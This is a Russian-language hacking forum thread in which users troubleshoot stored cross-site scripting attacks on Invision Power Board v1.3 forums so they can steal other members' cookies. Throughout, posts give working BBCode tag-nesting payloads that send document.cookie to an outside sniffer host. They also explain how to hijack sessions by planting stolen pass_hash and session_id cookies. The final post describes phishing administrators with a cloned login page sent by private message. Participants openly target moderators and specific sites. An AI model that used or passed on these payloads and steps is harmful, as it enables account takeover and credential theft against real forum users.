![]() |
Вопросы по форуму Invision Power Board(U) v1.3 Final © 2003(р)
Powered by Invision Power Board(U) v1.3 Final © 2003 IPS, Inc.
Русский Модифицированный IPB v1.3 Final © 2003 Вот пробовал получить хэш,а ни хрена пользовался: [COLOR=]` style=background:url(javascript:document.images[12].src="http://antichat.ru/cgi-bin/s.jpg?K:"+document.cookie) [/COLOR] также пробовал через Видео,но на логе не появляется информация.Почему,в чём я ошибся? З.Ы.я понимаю что такие вопросы вас задолбали,но в поиске я нихрена не нашёл=( |
Вообщето это мой код, =) в конце K: =)
У тебя должен быть IЕ и у них тоже. Или код измени только Алгол знает как. |
тоесть вот так?[COLOR=]` style=background:url(javascript:document.images[12].src="http://antichat.ru/cgi-bin/s.jpg?Ie:"+document.cookie) [/COLOR]
Что значит у них тоже?Это у кого? З.Ы.я не знаю чей это код,просто ходил по форуму и скопировал,я в этом слабо понимаю |
Нет, у тебя какой браузер? Интернет эксплорер?
Если нет, то не будит работать. |
у меня есть Опера,Фокс и Эксплор.Надо через эксплор?
|
да.
Или код менять. Алгол знает как. |
ща попробовал через эксплор...А если я выхожу и вхожу со своего компа в снифере это должно отобразиться?Чё то не показыватся
|
Непонил.
|
ну смотри,я отправляю через эксплорер сообщение в форум [COLOR=]`style=background:url(javascript:document.images[12].src="http://antichat.ru/cgi-bin/s.jpg?Ie:"+document.cookie)[/COLOR]
после этого по идее(как я понял)все входу пользователей должны фиксироваться тем,что на сниффер приходит инфа о кукизах итп.Значит если я выхожу из своего логина на форуме,а потом захожу обратно,инфа о моих пирожках тоже должна появится.Так? З.Ы.просто я не совсем догоняю весь этот процесс поэтому я могу что нить неправильно сказать(первый раз всё-таки) |
Ну они должны посмотреть на страницу с снифером. И мой код используй.
|
что то не выходит=(
а если для маскировочки я напишу так: 1)круто[COLOR=]` style=background:url(javascript:document.images[12].src="http://antichat.ru/cgi-bin/s.jpg?K:"+document.cookie) [/color] 2)круто` style=background:url(javascript:document.images[12].src="http://antichat.ru/cgi-bin/s.jpg?K:"+document.cookie) это будет работать?Или (1) или (2)? З.Ы.мне зайти на...? |
нет не тебе. Util.
1-й работает. Ты что то не правильно делаешь. На снифер Код HTML:
[COLOR=[IMG]http://aaa.aa/=`aaa.jpg[/IMG]]` style=background:url(javascript:document.images[12].src="http://antichat.ru/cgi-bin/s.jpg?K:"+document.cookie) [/COLOR]Код HTML:
[COLOR=[IMG]http://aaa.aa/=`aaa.jpg[/IMG]]` style=background:url(javascript:alert()) [/COLOR]http://antichat.ru/txt/IPB/index1.php |
а как понять на алерт?Что это даёт?
|
Это ты сам должен посмотреть. Трудно тебе объяснить.
Вот иди ко мне там пробуй и тесты проводи. http://www.whitejordan.ipbfree.com/ Я White Jordan. Мне тут просто баннули ник. |
похоже заработало частично,по крайней мере мой ИП и куки отображаются на сниффере, но нету реферера.Придётся завтра с утра пораньше отлавливать модеров=).Или что то опять неправильно?
А что попробовать?Алерт тебе запостить? |
да нет вродебы правельно.
А вдруг у них не Интернет Эксплорер? |
а чё если у них не Эксплорер то сё накрылось?=(
|
Не, если у них ИЭ то БУДИТ работать, а если нет, то код будит видным и тебя поймают и 3 кода лишенния свободы.....................
|
да то что код виден хер с ним.Главное чтобы куки отправились на снифф.Куки придут?
|
А если я после кода пропишу что нить то он будет работать?
Становиться ещё интереснее!!!:)Хотел щас дописать приписку" [color=http://aaaaa/=`aaajpg]` style=background:url(javascript:document.images[12].src="http://antichat.ru/cgi-bin/s.jpg?K:"+document.cookie) [/color] если у вас не отображается картинка,зайдите через Internet Explorer"(для очень доверчивых),а мне выдают:"незя использовать такой тег".Это по идее заплатка.Но почему она меня пропустила первый раз? |
Потому что первый раз уже вписалось.
Поэтому иди на чистое место. И когда код виден он соровно работает не бойся. Тут не код проблема а теги. |
понятно,ну этот код тока для эксплорера пашет=(И что хуже,там нету реферера,приходиться сидеть и ждать
|
а почему не пашет рассылка всех данных снифера?Написано:оставить рефер пустой и пришлют все данные.А пустым он не принимает
|
Цитата:
|
Цитата:
EDIT: Ошибка, прошу прошение. Когда код виден, то он работать НЕ будит. Только что проверил. Ищи другие теги так как проблема почему виден код в том, что ИЭ и Firefox по разному обрабатывают тег "IMG". И ещё. Ты просто не знаешь что такое что. Код HTML:
[COLOR=[IMG]http://aaa.aa/=`aaa.jpg[/IMG]]` style=background:url(javascript:document.images[12].src="http://antichat.ru/cgi-bin/s.jpg?K:"+document.cookie) [/COLOR]Вот образец REFERER: http://www.izvestia.ru/forum/topic.c...c=9663&start=0 |
Когда имеешь кукииз и у тебя нет пароля, то на любых версиях можно зделать следуещие.
Используй javascript:void(document.cookie) Код: javascript:void(document.cookie="pass_hash=XXXXXX" ); javascript:void(document.cookie="session_id=XXXXXX "); javascript:void(document.cookie="user_id=XXXXXX") Это ты должен всё в URL поставить и самое главное не забудь, ты должен быть в входе под другим именем. Тоесть ты должен быть "Logged in". Потом вводишь это и нажимаешь GO а потом Refresh. И самое главное знай что чтобы это у тебя получилось, твоя жертва тоже должна быть "Logged in". Если у тебя жертва "Logged out" то по МОИМ тестам нечиго не получится. Хотя если Я не прав поправте. А с прогой Inetcrack тесты Я пока не делал так что не знаю, может не получится если жертва не "Logged in" ? Алгол Я не разу не мог поменять фонт или попугать людей как ты вот тут. http://antichat.ru/txt/IPB/index1.php Если можешь, то помоги пожалуйста. Вот мой код который Я вставляю. Я его изменил на калар тег, но может быть проблема не в теги а в фильтре? Что конкретно что за проблема не понимаю. Вот Я написал собственный код изменив тег "VIDEO" на "COLOR" Код HTML:
[COLOR=[IMG]http://aaaaa/=`aaajpg[/IMG]]` style=background:url(javascript:document.body.innerHTML="http://antichat.ru/h.gif")[/COLOR]А когда пост делаю вообще не работает может быть потому что фильтор стоит но какой? |
чё туда надо вставлять адрес?Типа так?
Код:
[COLOR=http://aaa.aa/=`aaa.jpg]` style=background:url(javascript:document.images[12].src="http://antichat.ru/cgi-bin/s.jpg?K:http://www.****.com/forum/index.php?showtopic=4"+document.cookie) [/COLOR]По поводу хэша:не проще его расшивровать?Тогда никого ждать не надо |
Чего????
Ты меня совсем запутал. Что встовлять Я помой му уже очень хорошо расказал. Ещё раз всё прочти или правильно задай вопрос Я не понил что ты спросил. |
Распутываю:существует ли какой либо код,но универсальный для большинства браузеров?Если да,то где взять?
|
Napisat' svoiu.
|
Вложенные теги сработают только в IE
а [videо] везде вроде |
вообщем давайте так:есть форум http://www.qwerty.com/forum/
можете мне написать код,чтобы он работал в большинстве браузеров,или хотя бы только для ИЕ,но чтобы реферер работал,пажаласта,очень надо |
ЛюДИ!Есть кто живой?Ответте пажаласта
|
frtd -псих
сам с собой разговариват =) |
Цитата:
|
просто никто не отвечает
|
Frdt не псих
|
Почему?
|
А какую дыру использовать на Powered by Invision Power Board(U) v1.3.1 Final © 2003 IPS, Inc.???
|
1. делаешь свой снифер (чтобы без всяких подписок) Используешь баг с спаренными тэгами (т.е. пихаешь админу в ПМ снифер). И ждёшь когда прилетят к тебе куки. Потом редактируешь свои.
2. (если куки непришли) Спомощью тех же тэгов делаешь пересылку на свою страницу в ПМ админу. А на своей странице точная копия того форума (одна страница ошибки авторизации) Но в теле этой страницы ввод пароля и логина придёт к тебе на ящик. :) Покрайней мере у меня работало =) P.S. Это для MyIE и IE |
| Время: 03:31 |